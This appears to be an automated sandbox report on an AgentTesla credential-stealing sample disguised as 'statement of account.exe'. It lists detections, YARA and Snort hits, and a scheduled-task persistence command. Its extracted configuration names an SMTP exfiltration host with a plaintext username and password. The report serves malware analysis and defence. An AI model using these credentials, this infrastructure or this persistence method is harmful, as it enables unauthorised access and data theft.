
Windows Analysis Report
statement of account.exe

Overview

General Information

Sample Name:statement of account.exe
Analysis ID:756035
MD5:808f76963a9f42ad7310a3b7d65c7983
SHA1:f748a841b2ec35bc40ed0bacbe953c28bc11a8a6
SHA256:9f04b0b059e331845f8c3f9f4f83c785b07766529bb24dbbfb02fbab9e414938
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • statement of account.exe (PID: 3184 cmdline: C:\Users\user\Desktop\statement of account.exe MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • schtasks.exe (PID: 5144 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • LtdekfbHULJt.exe (PID: 1172 cmdline: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • schtasks.exe (PID: 4080 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • LtdekfbHULJt.exe (PID: 4984 cmdline: {path} MD5: 808F76963A9F42AD7310A3B7D65C7983)
  • LIhMQ.exe (PID: 5448 cmdline: "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe" MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • schtasks.exe (PID: 5380 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • LIhMQ.exe (PID: 5332 cmdline: {path} MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • LIhMQ.exe (PID: 2888 cmdline: {path} MD5: 808F76963A9F42AD7310A3B7D65C7983)
  • LIhMQ.exe (PID: 1920 cmdline: "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe" MD5: 808F76963A9F42AD7310A3B7D65C7983)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "mail.clipjoint.co.nz", "Username": "clipjoint@clipjoint.co.nz", "Password": "melandloz64"}
Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Author: unknown, Strings:
  • 0x2ff7c:$a13: get_DnsResolver
  • 0x2e71d:$a20: get_LastAccessed
  • 0x3090e:$a27: set_InternalServerPort
  • 0x30c2b:$a30: set_GuidMasterKey
  • 0x2e824:$a33: get_Clipboard
  • 0x2e832:$a34: get_Keyboard
  • 0x2fb97:$a35: get_ShiftKeyDown
  • 0x2fba8:$a36: get_AltKeyDown
  • 0x2e83f:$a37: get_Password
  • 0x2f32f:$a38: get_PasswordHash
  • 0x30379:$a39: get_DefaultCredentials
Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.statement of account.exe.3eca3f0.1.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.statement of account.exe.3eca3f0.1.unpack, Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.statement of account.exe.3eca3f0.1.unpack, Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Author: ditekSHen, Strings:
  • 0x30c63:$s10: logins
  • 0x306bf:$s11: credential
  • 0x2cc24:$g1: get_Clipboard
  • 0x2cc32:$g2: get_Keyboard
  • 0x2cc3f:$g3: get_Password
  • 0x2df87:$g4: get_CtrlKeyDown
  • 0x2df97:$g5: get_ShiftKeyDown
  • 0x2dfa8:$g6: get_AltKeyDown
Source: 0.2.statement of account.exe.3eca3f0.1.unpack, Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Author: unknown, Strings:
  • 0x2e37c:$a13: get_DnsResolver
  • 0x2cb1d:$a20: get_LastAccessed
  • 0x2ed0e:$a27: set_InternalServerPort
  • 0x2f02b:$a30: set_GuidMasterKey
  • 0x2cc24:$a33: get_Clipboard
  • 0x2cc32:$a34: get_Keyboard
  • 0x2df97:$a35: get_ShiftKeyDown
  • 0x2dfa8:$a36: get_AltKeyDown
  • 0x2cc3f:$a37: get_Password
  • 0x2d72f:$a38: get_PasswordHash
  • 0x2e779:$a39: get_DefaultCredentials
Source: 3.0.statement of account.exe.400000.0.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

                Persistence and Installation Behavior

                Source: Process started, Author: Joe Security, Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\statement of account.exe, ParentImage: C:\Users\user\Desktop\statement of account.exe, ParentProcessId: 3184, ParentProcessName: statement of account.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp, ProcessId: 5144, ProcessName: schtasks.exe
                Timestamp: 11/29/22-15:00:43.881102
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2030171
                Source Port: 49698
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:01:36.844935
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2851779
                Source Port: 49699
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:02:05.481443
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2030171
                Source Port: 49700
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:01:36.844935
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2840032
                Source Port: 49699
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:01:36.844935
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2030171
                Source Port: 49699
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:00:43.881210
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2840032
                Source Port: 49698
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:02:05.481443
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2840032
                Source Port: 49700
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:00:43.881210
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2851779
                Source Port: 49698
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected

                Timestamp: 11/29/22-15:02:05.481443
                Source IP: 192.168.2.3
                Destination IP: 27.54.86.236
                SID: 2851779
                Source Port: 49700
                Destination Port: 587
                Protocol: TCP
                Classtype: A Network Trojan was detected


                AV Detection

                Source: statement of account.exe, ReversingLabs: Detection: 69%
                Source: statement of account.exe, Virustotal: Detection: 36%
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe, ReversingLabs: Detection: 69%
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe, ReversingLabs: Detection: 69%
                Source: statement of account.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe, Joe Sandbox ML: detected
                Source: 3.0.statement of account.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8
                Source: 3.0.statement of account.exe.400000.0.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.clipjoint.co.nz", "Username": "clipjoint@clipjoint.co.nz", "Password": "melandloz64"}
                Source: statement of account.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: statement of account.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: 1xOMKkLm.pdb, source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr
                Source: Binary string: 1xOMKkLm.pdbSHA256, source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr

                Networking

                Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49698 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49698 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49698 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49699 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49699 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49699 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49700 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49700 -> 27.54.86.236:587
                Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49700 -> 27.54.86.236:587
                Source: Joe Sandbox View, ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
                Source: Joe Sandbox View, IP Address: 27.54.86.236
                Source: global traffic, TCP traffic: 192.168.2.3:49698 -> 27.54.86.236:587
                Source: global traffic, TCP traffic: 192.168.2.3:49698 -> 27.54.86.236:587
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://MFxeXD.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: statement of account.exe, 00000003.00000002.539956248.0000000003374000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.538143319.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.539916642.0000000002D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.clipjoint.co.nz
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000004.00000002.408840433.0000000002784000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: LtdekfbHULJt.exe, 00000016.00000002.539916642.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://6B3frV1LW6oD.com
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%mail.clipjoint.co.nzclipjoint
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknown, DNS traffic detected: queries for: mail.clipjoint.co.nz

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\Desktop\statement of account.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\statement of account.exe
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                Source: statement of account.exe, 00000000.00000002.281387531.0000000001008000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\statement of account.exe, Window created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe, Window created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe, Window created: window name: CLIPBRDWNDCLASS

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Users\user\Desktop\statement of account.exe, File written: C:\Windows\System32\drivers\etc\hosts

                System Summary

                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPE, Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPE, Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: 0.2.statement of account.exe.2d88c08.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender, Author: ditekSHen
                Source: 14.2.LIhMQ.exe.2fd8c00.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender, Author: ditekSHen
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPE, Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTR, Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f, Author: unknown
                Source: 3.0.statement of account.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB3FCD477u002d0AFFu002d4F50u002d9D97u002d53C1AE5E5EF7u007d/u00344619352u002d7691u002d445Bu002d9250u002dC24E2EA20EC7.cs, Large array initialization: .cctor: array initializer size 10581
                Source: statement of account.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.statement of account.exe.2d88c08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 14.2.LIhMQ.exe.2fd8c00.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
